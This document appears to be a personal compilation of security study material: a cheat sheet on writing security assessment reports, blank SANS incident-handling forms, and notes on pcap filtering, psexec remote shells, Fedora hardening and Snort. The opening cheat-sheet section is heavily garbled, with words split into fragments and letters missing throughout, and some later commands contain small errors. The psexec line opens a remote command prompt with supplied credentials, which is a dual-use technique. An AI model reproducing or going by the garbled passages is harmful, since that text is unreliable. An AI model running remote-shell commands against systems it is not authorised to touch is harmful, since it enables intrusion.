cum
en
t th
e s
ect
ion
s o
f th
e r
ep
ort
de
tail
ing
the
ass
ess
me
nt
me
tho
do
log
y a
nd
sco
pe
.
4.
Do
cum
en
t th
e s
ect
ion
s o
f th
e r
ep
ort
de
scri
bin
g
yo
ur
fin
din
gs
an
d r
eco
mm
en
da
tio
ns.
5.
Att
ach
re
leva
nt
fig
ure
s a
nd
ra
w d
ata
to
su
pp
ort
the
ma
in b
od
y o
f th
e r
ep
ort
.
6.
Cre
ate
th
e e
xecu
tive
su
mm
ary
to
hig
hli
gh
t th
e
ke
y f
ind
ing
s a
nd
re
com
me
nd
ati
on
s.
7.
Pro
of-
rea
d a
nd
ed
it t
he
do
cum
en
t.
8.
Co
nsi
de
r su
bm
itti
ng
th
e r
ep
ort
’s dr
aft t
o w
ee
d
ou
t fa
lse
po
siti
ve
s a
nd
co
nfi
rm e
xpe
cta
tio
ns.
9.
Su
bm
it t
he
fin
al
rep
ort
to
th
e i
nte
nd
ed
re
cip
ien
t
usi
ng
ag
ree
d-u
po
n s
ecu
re t
ran
sfe
r m
ech
an
ism
.
10
. Di
sus
s the
repo
rt’s
ote
ts
ith th
e re
ipie
t o
n t
he
ph
on
e o
r in
pe
rso
n.
An
aly
sis
of
the
Se
cu
rity
Asse
ssm
en
t D
ata
Yo
ur
an
aly
sis
sho
uld
pro
vid
e v
alu
e b
ey
on
d
reg
urg
ita
tin
g t
he
da
ta a
lre
ad
y i
n e
xist
en
ce.
Co
nsi
de
r w
ha
t in
form
ati
on
pro
vid
ed
to
yo
u is
inco
mp
lete
or
mig
ht
be
a l
ie o
r h
alf
-tru
th.
Gro
up
in
itia
l fi
nd
ing
s b
ase
d o
n a
ffe
cte
d r
eso
urc
es,
risk
, is
sue
ca
teg
ory
, e
tc.
to l
oo
k f
or
pa
tte
rns.
Ide
nti
fy f
or
tre
nd
s th
at
hig
hlig
ht
the
exi
ste
nce
of
un
de
rly
ing
pro
ble
ms
tha
t a
ffe
ct s
ecu
rity
.
If e
xam
inin
g s
can
ne
r o
utp
ut,
co
nsi
de
r e
xplo
rin
g t
he
da
ta u
sin
g s
pre
ad
she
ets
an
d p
ivo
t ta
ble
s.
Fil
l in
th
e g
ap
s in
yo
ur
un
de
rsta
nd
ing
wit
h f
oll
ow
-up
sca
ns,
do
cum
en
t re
qu
est
s a
nd
/or
inte
rvie
ws.
Inv
olv
e c
oll
ea
gu
es
in y
ou
r a
na
lysi
s to
ob
tain
oth
er
peop
le’s
pers
peti
es o
the
data
ad
olu
sios.
Asse
ssm
en
t M
eth
od
olo
gy
Do
cu
me
nta
tio
n
Do
cum
en
t th
e m
eth
od
olo
gy
use
d t
o p
erf
orm
th
e
ass
ess
me
nt,
an
aly
ze d
ata
an
d p
rio
riti
ze f
ind
ing
s.
The
etho
dolo
g’s
des
riptio
ne
ed
to
de
mo
nst
rate
a s
yst
em
ic a
nd
we
ll-r
ea
son
ed
ass
ess
me
nt
ap
pro
ach
.
Cla
rify
th
e t
yp
e o
f th
e a
sse
ssm
en
t p
erf
orm
ed
:
pe
ne
tra
tio
n t
est
, v
uln
era
bil
ity
ass
ess
me
nt,
etc
.
If a
pp
lica
ble
, e
xpla
in w
ha
t se
curi
ty a
sse
ssm
en
t to
ols
we
re u
sed
an
d h
ow
th
ey
we
re c
on
fig
ure
d.
If a
pp
lica
ble
, d
esc
rib
e w
ha
t a
pp
roa
ch g
uid
ed
th
e
qu
est
ion
s y
ou
ask
ed
du
rin
g in
terv
iew
s.
De
scri
be
th
e c
rite
ria
use
d t
o a
ssig
n s
eve
rity
or
crit
ica
lity
le
vels
to
th
e f
ind
ing
s o
f th
e a
sse
ssm
en
t.
Re
fer
to t
he
re
lev
an
t fr
am
ew
ork
s y
ou
use
d t
o g
uid
e
the
ass
ess
me
nt
eff
ort
s (P
CI
DS
S,
ISO
27
00
1,
etc
.).
Sc
op
e o
f th
e S
ec
uri
ty A
sse
ssm
en
t
Sp
eci
fy w
ha
t sy
ste
ms,
ne
two
rks
an
d/o
r a
pp
lica
tio
ns
we
re r
ev
iew
ed
as
pa
rt o
f th
e s
ecu
rity
ass
ess
me
nt.
Sta
te w
ha
t d
ocu
me
nta
tio
n w
as
revi
ew
ed
if
an
y.
List
th
e p
eo
ple
wh
om
yo
u in
terv
iew
ed
, if
an
y.
Cla
rify
th
e p
rim
ary
go
als
of
the
ass
ess
me
nt
pro
ject
.
Dis
cuss
wh
at
con
tra
ctu
al
ob
lig
ati
on
s o
r re
gu
lato
ry
req
uir
em
en
ts w
ere
acc
ou
nte
d f
or
in t
he
ass
ess
me
nt.
Do
cum
en
t a
ny i
tem
s th
at
we
re s
pe
cifi
cally
exc
lud
ed
fro th
e as
sess
et’s
sop
e a
d ex
plai
wh
y.
Do
cu
me
nti
ng
Co
nc
lusio
ns
Incl
ud
e b
oth
ne
ga
tive
an
d p
osi
tive
fin
din
gs.
Aou
t for
org
aiza
tio’s
idu
str
, b
usi
ne
ss m
od
el
an
d c
om
pli
an
ce r
eq
uir
em
en
ts w
he
re a
pp
rop
ria
te.
Sta
y c
on
sist
en
t w
ith
th
e m
eth
od
olo
gy
an
d s
cop
e.
Pri
ori
tize
fin
din
gs
rela
ted
to
se
curi
ty r
isk
s.
Pro
vid
e p
ract
ica
l re
me
dia
tio
n p
ath
, a
cco
un
tin
g f
or
the
orga
izatio
’s st
regt
hs a
d ea
kes
ses.
Qu
ali
tie
s o
f a
Go
od
Asse
ssm
en
t R
ep
ort
Sta
rts
wit
h a
str
on
g e
xecu
tive
su
mm
ary
th
at
a n
on
-
tech
ni c
al
rea
de
r ca
n u
nd
ers
tan
d
Pro
vid
es
me
an
ing
ful a
na
lysi
s, r
ath
er
tha
n m
ere
ly
pre
sen
tin
g t
he
ou
tpu
t o
f a
sse
ssm
en
t to
ols
Incl
ud
es
sup
po
rtin
g f
igu
res
to s
up
po
rt t
he
an
aly
sis
De
scri
be
s a
sse
ssm
en
t m
eth
od
olo
gy
an
d s
cop
e
Loo
ks
pro
fess
ion
al
an
d i
s w
ith
ou
t ty
po
s
Off
ers
re
me
dia
tio
n g
uid
an
ce b
ey
on
d m
ere
ly p
oin
tin
g
ou
t se
curi
ty p
rob
lem
s
Is s
tru
ctu
red
in
lo
gic
al
sect
ion
s to
acc
om
mo
da
te t
he
dif
fere
nt
gro
up
s ho
’ll re
ad a
d a
t upo
it
Ad
dit
ion
al
Asse
ssm
en
t R
ep
ort
Tip
s
Cre
ate
te
mp
late
s b
ase
d o
n p
rio
r re
po
rts,
so
yo
u
do’t
hae
to
rite
eer
do
ue
t fro
sra
th.
Sa
feg
ua
rd (
en
cry
pt)
th
e r
ep
ort
wh
en
sto
rin
g a
nd
sen
din
g i
t, s
ince
its
co
nte
nts
are
pro
ba
bly
se
nsi
tive
.
Use
co
ncr
ete
sta
tem
en
ts;
avo
id p
ass
ive
vo
ice
.
Exp
lain
th
e s
ign
ific
an
ce o
f th
e s
ecu
rity
fin
din
gs
in t
he
con
text
of
curr
en
t th
rea
ts a
nd
eve
nts
.
Pu
t e
ffo
rt i
nto
ma
kin
g t
he
re
po
rt a
s b
rie
f a
s p
oss
ible
wit
ho
ut
om
itti
ng
im
po
rta
nt
an
d r
ele
va
nt
con
ten
ts.
Mo
re S
ec
uri
ty A
sse
ssm
en
t T
ips
6 Q
ua
liti
es
of
a G
oo
d I
nfo
rma
tio
n S
ecu
rity
Re
po
rt:
htt
p:/
/j.m
p/m
3A
K9
r
4 T
ips
for
a S
tro
ng
Exe
cuti
ve
Su
mm
ary
of
a S
ecu
rity
Ass
ess
me
nt
Re
po
rt:
htt
p:/
/j.m
p/j
sT6
69
Se
curi
ty A
sse
ssm
en
t R
ep
ort
as
Cri
tiq
ue
, N
ot
Cri
tici
sm:
htt
p:/
/j.m
p/m
6e
6p
0
4 R
ea
son
s W
hy
Se
curi
ty A
sse
ssm
en
t
Re
com
me
nd
ati
on
s G
et
Ign
ore
d:
htt
p:/
/j.m
p/i
rFH
Ra
De
ali
ng
wit
h M
isin
form
ati
on
Du
rin
g S
ecu
rity
Ass
ess
me
nts
: h
ttp
://j
.mp
/jv8
jxz
Au
tho
red
Le
nn
y Z
elt
ser,
wh
o w
rite
s a
da
ily
se
curi
ty b
log
at
blo
g.z
elt
ser.
com
; y
ou
ca
n a
lso
fin
d h
im o
n T
wit
ter
as
@le
nn
yze
ltse
r. T
his
ch
ea
t sh
ee
t w
as
rev
iew
ed
by D
ave
Sh
ack
lefo
rd a
nd
Jo
hn
S
tra
nd
. It’
s dis
trib
ute
d a
cco
rdin
g t
o t
he
Cre
ati
e Co
os
3 At
tri
utio
Lice
nse
. Yo
u’re
loo
kin
g a
t ve
rsio
n 1
.0 o
f th
is d
ocu
me
nt.
Fo
r m
ore
se
curi
ty c
he
at
she
ets
se
e h
ttp
://j
.mp
/mrG
gH
J.
114
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT COMMUNICATION LOG DATE UPDATED:_____________
Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________
Initiator Name:________________________________ Receiver Name:________________________________
Initiator Title: _________________________________ Receiver Title: _________________________________
Initiator Organization: __________________________ Receiver Organization:___________________________
Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________
Details:_______________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________
Initiator Name:________________________________ Receiver Name:________________________________
Initiator Title: _________________________________ Receiver Title: _________________________________
Initiator Organization: __________________________ Receiver Organization:___________________________
Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________
Details:_______________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________
Initiator Name:________________________________ Receiver Name:________________________________
Initiator Title: _________________________________ Receiver Title: _________________________________
Initiator Organization: __________________________ Receiver Organization:___________________________
Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________
Details:_______________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Prepared By: Greg Jones100115
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT CONTACT LIST DATE UPDATED:_____________
Corporate Security Officer: Corporate Incident Handling, CIRT, or FIRST Team:
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Corporate Legal Affairs Officer: CIO or Information Systems Security Manager:
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Corporate Public Affairs Officer: Other (Specify):__________________________
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Prepared By: Greg Jones101116
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT CONTACT LIST DATE UPDATED:_____________
Local Contacts
Internet Service Provider Technical Contact: Local FBI or Equivalent Agency:
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Local Law Enforcement Computer Crime: Local CIRT or FIRST Team:
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Other (Specify):__________________________ Other (Specify):__________________________
Name:_______________________________________ Name:_______________________________________
Title: ________________________________________ Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________
Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________
Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________
E-mail: ______________________________________ E-mail: ______________________________________
Address: _____________________________________ Address: _____________________________________
_____________________________________________ _____________________________________________
Prepared By: Greg Jones102117
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT IDENTIFICATION DATE UPDATED:_____________
General Information
Incident Detector’s Information:
Name:_______________________________________ Date and Time Detected: ________________________
Title: ________________________________________
Phone:______________ Alt. Phone: ______________ Location Incident Detected From: __________________
Mobile: ______________ Pager:__________________ _____________________________________________
Fax:_________________ Alt. Fax:_________________ Additional Information:___________________________
E-mail: ______________________________________ _____________________________________________
Address: _____________________________________ _____________________________________________
_____________________________________________ _____________________________________________
Detector’s Signature:____________________________ Date Signed: __________________________________
Incident Summary
Type of Incident Detected:
• Denial of Service • Unauthorized Use • Espionage • Probe • Hoax
• Malicious Code • Unauthorized Access • Other:____________________________________
Incident Location:
Site:_________________________________________ How was the Incident Detected:____________________
Site Point of Contact:____________________________ _____________________________________________
Phone:______________ Alt. Phone: ______________ _____________________________________________
Mobile: ______________ Pager:__________________ _____________________________________________
Fax:_________________ Alt. Fax:_________________ _____________________________________________
E-mail: ______________________________________ _____________________________________________
Address: _____________________________________ _____________________________________________
_____________________________________________ _____________________________________________
Additional Information: ______________________________________________________________________________
________________________________________________________________________________________________
________________________________________________________________________________________________
Prepared By: Greg Jones103118
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT CONTAINMENT DATE UPDATED:_____________
Isolate affected systems:
Command Decision Team approved removal from network? • YES • NO
If YES, date and time systems were removed: ________________________________________________________
If NO, state the reason: __________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Backup affected systems:
System backup successful for all systems? • YES • NO
Name of persons who did backup:__________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Date and time backups started:____________________________________________________________________
Date and time backups complete: __________________________________________________________________
Backup tapes sealed? • YES • NO Seal Date: ________________________
Backup tapes turned over to:______________________________________________________________________
Signature:_______________________________________________________ Date: ________________________
Backup Storage Location: ________________________________________________________________________
Prepared By: Greg Jones104119
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT ERADICATION DATE UPDATED:_____________ Name of persons performing forensics on systems: ________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Was the vulnerability identified? • YES • NO
Describe: _____________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
What was the validation procedure used to ensure problem was eradicated: ____________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Prepared By: Greg Jones105120
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2003 All Rights Reserved
© S
ANS In
stitu
te 2
003,
All
Right
s Res
erve
d.
COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __
INCIDENT SURVEY DATE UPDATED:_____________
.
Location(s) of affected systems: _____________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Date and time incident handlers arrived at site: ________________________________________________
_____________________________________________________________________________________________
_____________________________________________________________________________________________
Describe affected information system(s) (one form per system is recommended):
Hardware Manufacturer:__________________________________________________________________________
Serial Number: _________________________________________________________________________________
Corporate Property Number (if applicable): ___________________________________________________________
Is the affected system connected to a network? • YES • NO
System Name: _________________________________________________________________________________
System Network Address:_________________________________________________________________________
MAC Address: _________________________________________________________________________________
Is the affected system connected to a modem? • YES • NO
Phone Number: __________________________________________________________________________________
Describe the physical security of the location of affected information systems (locks, security alarms, building access, etcetera): _______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
_______________________________________________________________________________________________
Prepared By: Greg Jones106121
Notes:
These are just miscellaneous notes I use frequently.
Searching through multiple pcaps at once:
for i in *; do ngrep -W byline -O /desired/ouput/directory/traffic$i.pcap -qI $i host 192.168.1.1;
done
cd /desired/output/directory
mergecap -w desiredname.pcap traffic*.pcap
You now have a single pcap with just your desired traffic based on the bpf filters you gave the first
command.
Windows psexec remote cmd prompt:
First download Sysinternals from microsoft and from a command prompt navigate to the folder
psexec.exe \\targetIP -u username -p password cmd.exe
this may work without the username and password options if your computer is part of the domain
107122
Notes:
108123
Notes:
109124
Notes:
110125
Notes:
111126
Notes:
112127
Notes:
113128
Notes:
114129
Fedora Linux Hardening Steps: 1. Want to check for things as runlevel 3. We want to turnoff excess
a. chkconfig –list | grep '3:on
b. Turn off services with: chkconfig serviceName off
2. (prolly not on GSE) but to check packages do: yum list
a. To remove: yum -y remove package-name
3. run: netstat -tulpn to see which ports are open and associated programs. Here is Fedora Sample Services
[root@localhost ~]# netstat -tulpn Active Internet connections (only servers) (IN LAB I NMAP AND NO OPENED PORTS)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 483/rpcbind
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 758/sshd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1164/cupsd
tcp 0 0 0.0.0.0:41116 0.0.0.0:* LISTEN 806/rpc.statd
tcp6 0 0 :::111 :::* LISTEN 483/rpcbind
tcp6 0 0 :::22 :::* LISTEN 758/sshd
tcp6 0 0 ::1:631 :::* LISTEN 1164/cupsd
tcp6 0 0 :::56797 :::* LISTEN 806/rpc.statd
udp 0 0 0.0.0.0:5353 0.0.0.0:* 444/avahi-daemon: r
udp 0 0 0.0.0.0:43287 0.0.0.0:* 806/rpc.statd
udp 0 0 127.0.0.1:323 0.0.0.0:* 475/chronyd
udp 0 0 0.0.0.0:622 0.0.0.0:* 483/rpcbind
udp 0 0 0.0.0.0:50086 0.0.0.0:* 444/avahi-daemon: r
udp 0 0 127.0.0.1:982 0.0.0.0:* 806/rpc.statd
udp 0 0 0.0.0.0:68 0.0.0.0:* 1345/dhclient
udp 0 0 0.0.0.0:10331 0.0.0.0:* 1345/dhclient
udp 0 0 0.0.0.0:111 0.0.0.0:* 483/rpcbind
udp 0 0 0.0.0.0:123 0.0.0.0:* 475/chronyd
udp6 0 0 ::1:323 :::* 475/chronyd
udp6 0 0 :::19785 :::* 1345/dhclient
udp6 0 0 :::53756 :::* 806/rpc.statd
udp6 0 0 :::622 :::* 483/rpcbind
udp6 0 0 :::111 :::* 483/rpcbind
udp6 0 0 :::123 :::* 475/chronyd
4. /etc/sudoers file can be edited using visudo
You can add a user to the sudoers group to give full priv or:
a. jadmin ALL=/sbin/halt, /bin/kill, /etc/init.d/httpd ( this will allow certain commands)
5. SSH - /etc/ssh/sshd_config
a. PermitRootLogin no
b. AllowUsers username username username username (allow/deny can be user interchangeably)
c. DenyGroups group1 group2 (allow/deny can be used interchangeably)
d. Using protocol v2: Protocol 2
e. ClientAliveInterval 300 (this is seconds, sets the idle log timeout interval) f.ClientAliveCountMax 0 g. IgnoreRhosts yes (disables .rhosts file) h. PermitEmptyPasswords no
6. allow or disallow users using cron /etc/cron.deny or /etc/cron/deny
a. to disallow ALL users: echo ALL >> /etc/cron.deny
7. Enable or Disable Selinux /etc/selinux/config
a. You can view current status of SELinux mode from the command line using ‘system-config-selinux‘,
‘getenforce‘ or ‘sestatus‘ commands.
b. #sestatus
c. #setenforce enforcing (enables)
8. Passwords /etc/security/opasswd contains all old passwords.
a. nano /etc/pam.d/system-auth
b. add the following line to disallow use from using last 5 pw's
password sufficient pam.unix.so nullock use_authtok md5 shadow remember=5
c. to view existing users aging info like expiry date and time use: chage -l username
d. to change: chage -M 60 username
chage -M -m 7 -W 7 username (-M set max days, -m set min days, -W set days to warn)
c. To lock or unlock an account passwd -l accountName or passwd -u accountName
d. Enforcing Strong passwords /etc/pam.dsystem-auth
/lib/security/$ISA/pam_cracklib.so retry=3 minlen=8 lcredit=-1 ucredit=-2 dcredit=-2 ocredit=-1
uppercase = lcredit, ucredit = undercase, digit is dcredit = -2, ocredit =-1 or other char
e. checking accounts for empty passwords cat /etc/passwd | awk -F '($2==””){print $1}'
IF the password is in /etc/shadow there will be a 'x' but if it is empty there will be noting in that field
f. /etc/shadow {userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}:
{Warn}:{Inactive}:{Expire}:
9. Important Logs
/var/log/message – Where whole system logs or current activity logs are available.
/var/log/auth.log – Authentication logs.
/var/log/kern.log – Kernel logs.
/var/log/cron.log – Crond logs (cron job).
/var/log/maillog – Mail server logs.
/var/log/boot.log – System boot log.
/var/log/mysqld.log – MySQL database server log file.
/var/log/secure – Authentication log.
/var/log/utmp or /var/log/wtmp : Login records file.
/var/log/yum.log: Yum log files.
10. Keep /boot as read only and not read execute. Nano /etc/fstab
a. should be LABEL=/boot /boot ext4 defaults,ro 1 2
11. Its important to keep updated using yum update
12. Make sure non-root accounts have UID set to 0: awk -F: '($3 == “0”) {print}' /etc/passwd
Should only see: root:x:0:0:root:/root:/bin/bash
13. Disable Unwanted SUID and GSGID Binaries: find / -iperm +4000 and find / -perm +2000
SUID/SGID sudo find / -xdev -type f -perm +ug=s
14. World-writable files: find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
sudo find / -path /proc -prune -o \
-perm +o=w ! \( -type d -perm +o=t \) ! -type l
15. No owner Files: find /dir -xdev \( -nouser -o -nogroup \) -print\
15.5 find / -perm +6000 -type f -exec ls -ld {} \; 16. Configure Linux or Unix host to logging message to a centralized loghost
You need to open syslog configuration file /etc/syslog.conf:
# vi /etc/syslog.conf
Setup syslogd to send all important message related to auth to loghost IP 192.168.1.100 (or use FQDN if
configured)
*.*;auth,authpriv.none @192.168.1.100
OR
*.*;auth,authpriv.none @loghost.mydomain.com.
Restart sysklogd (Debian Linux):
# /etc/init.d/sysklogd restart
OR
Restart syslogd under Red Hat/Fedora / CentOS Linux
# service syslog restart
If required open outgoing UDP 514 port from other hosts:
iptables -A OUTPUT -p udp -s 192.168.1.100 --sport 1024:65535 -d 192.168.1.5 --dport 514 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -m state --state
ESTABLISHED -j ACCEPT
sudo iptables-save > /etc/iptables_rules
It doesn't really matter where you put the file, all you have to do is make sure that the next line refers to
the same file. Next, open /etc/rc.local and add this line: /sbin/iptables-restore < /etc/iptables_rules
17. The default configuration file is /etc/logrotate.conf
18.Connection Banners. Located at /etc/motd for ssh. All others at /etc/banners. Needs to be first configured in
/etc/hosts.allow by adding the following line: vsftpd : ALL : banners /etc/banners. Can also restrict based on the
following portmap : 1.2.3.4 : deny
19. ALL : 206.182.68.0 : spawn /bin/ 'date' %c %d >> /var/log/intruder_alert
The %d token supplies the name of the service that the attacker was trying to access.
To allow the connection and log it, place the spawn directive above in the /etc/hosts.allow file.
20. NIS
a. An NIS server is comprised of several applications. They include the following: • /usr/sbin/rpc.yppasswdd — Also called the yppasswdd service, this daemon allows users to change their
NIS passwords. • /usr/sbin/rpc.ypxfrd — Also called the ypxfrd service, this daemon is responsible for NIS map transfers
over the network. • /usr/sbin/yppush — This application propagates changed NIS databases to multiple NIS servers. • /usr/sbin/ypserv — This is the NIS server daemon.
21. NIS – Typically port 834, 835
If the /var/yp/securenets file is blank or does not exist (as is the case after a default installation), NIS listens
to all networks. One of the first things to do is to put netmask/network pairs in the file so that ypserv only
responds to requests from the appropriate network.
Below is a sample entry from a /var/yp/securenets file:
255.255.255.0 192.168.0.0
22. NFS Firewall Configuration
The ports used for NFS are assigned dynamically by rpcbind, which can cause problems when creating firewall rules. To simplify this process, use the /etc/sysconfig/nfs file to specify which ports are to be used:
• MOUNTD_PORT — TCP and UDP port for mountd (rpc.mountd) • STATD_PORT — TCP and UDP port for status (rpc.statd) • LOCKD_TCPPORT — TCP port for nlockmgr (rpc.lockd) • LOCKD_UDPPORT — UDP port nlockmgr (rpc.lockd)
Port numbers specified must not be used by any other service. Configure your firewall to allow the port numbers specified, as
well as TCP and UDP port 2049 (NFS). Run the rpcinfo -p command on the NFS server to see which ports and RPC programs are being used.
23. Securing Apache HTTP Server
Always verify that any scripts running on the system work as intended before putting them into production.
Also, ensure that only the root user has write permissions to any directory containing scripts or CGIs. To do
this, run the following commands as the root user:
1. chown root <directory_name>
2. chmod 755 <directory_name>
System administrators should be careful when using the following configuration options (configured in
/etc/httpd/conf/httpd.conf):
24. Securing FTP
a. To change the greeting banner for vsftpd, add the following directive to the /etc/vsftpd/vsftpd.conf file:
ftpd_banner=<insert_greeting_here>
b. /var/ftp/ if this file exists then anonymous access exists
c. anon_upload_enable=NO (in the /etc/vsftpd/vsftpd.conf
d. local_enable=NO (this will disable local accounts from using FTP)
e. To disable specific user accounts in vsftpd, add the username to /etc/vsftpd.ftpusers
25. Limiting a DOS attacker
By setting limits to the following directives in /etc/mail/sendmail.mc, the effectiveness of such attacks is
limited.
confCONNECTION_RATE_THROTTLE — The number of connections the server can receive per
second. By default, Sendmail does not limit the number of connections. If a limit is set and reached,
further connections are delayed.
confMAX_DAEMON_CHILDREN — The maximum number of child processes that can be spawned by
the server. By default, Sendmail does not assign a limit to the number of child processes. If a limit is
set and reached, further connections are delayed.
confMIN_FREE_BLOCKS — The minimum number of free blocks which must be available for the
server to accept mail. The default is 100 blocks.
confMAX_HEADERS_LENGTH — The maximum acceptable size (in bytes) for a message header.
confMAX_MESSAGE_SIZE — The maximum acceptable size (in bytes) for a single message.
26. Service Only Accounts or restricting console access
Shell accounts on the server should not be allowed and all user shells in the /etc/passwd file
should be set to /sbin/nologin (with the possible exception of the root user).
27. TIME
From the desktop, go to Applications (the main menu on the panel) > System Settings > Date & Time
• From the desktop, right-click on the time in the toolbar and select Adjust Date and Time.
28. NTP
The Network Time Protocol (NTP) daemon synchronizes the system clock with a remote time server or time
source. The application allows you to configure an NTP daemon to synchronize your system clock with a
remote server. To enable this feature, select Enable Network Time Protocol. This enables the NTP Servers
list and other options. You can choose one of the predefined servers, edit a predefined server by clicking the
Edit or add a new server name by clicking Add. Your system does not start synchronizing with the NTP
server until you click OK. After clicking OK, the configuration is saved and the NTP daemon is started (or
restarted if it is already running).
Clicking the OK button applies any changes made to the date and time, the NTP daemon settings, and the
time zone settings. It also exits the program.
29.
Snort Notes 1. modify snort.conf.
2. change variables (look to step 3 for examples)
3. change site specific rules. Should have include $RULE_PATH/local.rules
include $RULE_PATH/downloaded.rules
# Setup the network addresses you are protecting(EXAMPLES of Variables) ipvar HOME_NET [192.168.0.0/16]
# Set up the external network addresses. Leave as "any" in most situations
ipvar EXTERNAL_NET [!$HOME_NET]
4. to test pcap: sudo snort -r ~/Desktop/test.pcap -c /etc/snort/snort.conf -l ~/Desktop
-r reads the pcap, -c selects conf file, -l dumps locally
